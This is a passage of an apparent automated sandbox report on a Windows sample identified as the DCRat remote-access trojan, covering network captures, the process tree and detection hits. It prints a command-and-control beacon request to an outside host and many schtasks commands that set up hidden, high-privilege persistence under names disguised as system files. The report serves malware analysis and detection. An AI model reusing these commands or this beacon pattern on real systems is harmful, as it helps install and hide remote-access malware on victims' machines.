Aug 6, 2022 00:53:01.444423914 CEST	1689	IN	Data Raw: 33 2e 39 36 35 33 20 31 37 34 2e 30 38 38 43 39 34 2e 31 35 36 36 20 31 37 34 2e 32 37 39 20 39 34 2e 33 34 37 39 20 31 37 34 2e 34 37 20 39 34 2e 33 34 37 39 20 31 37 34 2e 38 35 32 43 39 34 2e 37 33 30 34 20 31 37 35 2e 34 32 34 20 39 35 2e 31 Data Ascii: 3.9653 174.088C94.1566 174.279 94.3479 174.47 94.3479 174.852C94.7304 175.424 95.1129 175.806 95.4955 176.379C96.4518 177.525 97.4081 178.48 98.747 179.053C99.1295 179.243 99.512 179.625 99.8946 179.625C100.086 179.625 100.086 179.625 100.277
Aug 6, 2022 00:53:01.507935047 CEST	1691	IN	Data Raw: 30 38 43 31 31 37 2e 38 37 33 20 33 35 32 2e 32 34 34 20 31 31 36 2e 37 32 36 20 33 35 33 2e 37 37 32 20 31 31 35 2e 35 37 38 20 33 35 35 2e 31 30 39 43 31 31 33 2e 32 38 33 20 33 35 38 2e 31 36 34 20 31 31 31 2e 31 37 39 20 33 36 31 2e 36 30 31 Data Ascii: 08C117.873 352.244 116.726 353.772 115.578 355.109C113.283 358.164 111.179 361.601 109.267 364.847C108.884 365.42 109.267 366.375 110.032 366.375C119.212 366.184 128.393 365.611 137.574 364.656C141.973 364.083 146.563 363.701 150.962 362.938C1
Aug 6, 2022 00:53:01.584369898 CEST	1737	OUT	GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a0702220.xsph.ru
Aug 6, 2022 00:53:01.648134947 CEST	1738	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 05 Aug 2022 22:53:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cDouNOFXle.exePID: 3632, Parent PID: 5252

General

Target ID:	0
Start time:	00:52:03
Start date:	06/08/2022
Path:	C:\Users\user\Desktop\cDouNOFXle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cDouNOFXle.exe"
Imagebase:	0x60000
File size:	1232540 bytes
MD5 hash:	54172888B473F2515B13FE1E2032A112
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 5792, Parent PID: 3632

General

Target ID:	1
Start time:	00:52:05
Start date:	06/08/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe"
Imagebase:	0x380000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5824, Parent PID: 5792

General

Target ID:	4
Start time:	00:52:08
Start date:	06/08/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" "
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5080, Parent PID: 5824

General

Target ID:	5
Start time:	00:52:08
Start date:	06/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: chainsavesref.exePID: 3372, Parent PID: 5824

General

Target ID:	6
Start time:	00:52:08
Start date:	06/08/2022
Path:	C:\comproviderRuntimecommon\chainsavesref.exe
Wow64 process (32bit):	false
Commandline:	C:\comproviderRuntimecommon\chainsavesref.exe
Imagebase:	0x350000
File size:	848384 bytes
MD5 hash:	4EAF964B744BD6801B5122AE1AFBBDE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5100, Parent PID: 4740

General

Target ID:	8
Start time:	00:52:14
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2292, Parent PID: 4740

General

Target ID:	9
Start time:	00:52:14
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73c930000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5208, Parent PID: 4740

General

Target ID:	10
Start time:	00:52:15
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5296, Parent PID: 4740

General

Target ID:	11
Start time:	00:52:16
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1100, Parent PID: 4740

General

Target ID:	12
Start time:	00:52:16
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5284, Parent PID: 4740

General

Target ID:	14
Start time:	00:52:16
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: MrsUvRPGeImAhc.exePID: 3432, Parent PID: 848

General

Target ID:	16
Start time:	00:52:17
Start date:	06/08/2022
Path:	C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
Imagebase:	0x960000
File size:	848384 bytes
MD5 hash:	4EAF964B744BD6801B5122AE1AFBBDE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 3056, Parent PID: 4740

General

Target ID:	17
Start time:	00:52:17
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2232, Parent PID: 4740

General

Target ID:	19
Start time:	00:52:17
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 6120, Parent PID: 4740

General

Target ID:	20
Start time:	00:52:18
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5800, Parent PID: 4740

General

Target ID:	21
Start time:	00:52:19
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4592, Parent PID: 4740

General

Target ID:	22
Start time:	00:52:19
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: MrsUvRPGeImAhc.exePID: 2756, Parent PID: 848

General

Target ID:	23
Start time:	00:52:19
Start date:	06/08/2022
Path:	C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
Imagebase:	0xcf0000
File size:	848384 bytes
MD5 hash:	4EAF964B744BD6801B5122AE1AFBBDE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 55%, Virustotal, Browse Detection: 70%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2072, Parent PID: 4740

General

Target ID:	24
Start time:	00:52:19
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5100, Parent PID: 4740

General

Target ID:	26
Start time:	00:52:20
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2292, Parent PID: 4740

General

Target ID:	27
Start time:	00:52:21
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4036, Parent PID: 4740

General

Target ID:	28
Start time:	00:52:21
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4200, Parent PID: 4740

General

Target ID:	29
Start time:	00:52:22
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 1820, Parent PID: 848

General

Target ID:	30
Start time:	00:52:22
Start date:	06/08/2022
Path:	C:\Recovery\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\explorer.exe
Imagebase:	0x100000
File size:	848384 bytes
MD5 hash:	4EAF964B744BD6801B5122AE1AFBBDE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, Virustotal, Browse Detection: 70%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5304, Parent PID: 4740

General

Target ID:	31
Start time:	00:52:22
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 5580, Parent PID: 848

General

Target ID:	32
Start time:	00:52:22
Start date:	06/08/2022
Path:	C:\Recovery\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\explorer.exe
Imagebase:	0x2a0000
File size:	848384 bytes
MD5 hash:	4EAF964B744BD6801B5122AE1AFBBDE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 3896, Parent PID: 4740

General

Target ID:	33
Start time:	00:52:23
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5280, Parent PID: 4740

General

Target ID:	35
Start time:	00:52:24
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 6024, Parent PID: 4740

General

Target ID:	36
Start time:	00:52:24
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 5608, Parent PID: 4740

General

Target ID:	37
Start time:	00:52:24
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 6056, Parent PID: 4740

General

Target ID:	38
Start time:	00:52:25
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 2292, Parent PID: 4740

General

Target ID:	40
Start time:	00:52:26
Start date:	06/08/2022
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff73fb60000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: cDouNOFXle.exePID: 3632, Parent PID: 5252COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1506
Total number of Limit Nodes:	25

Executed Functions

Function 0007D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

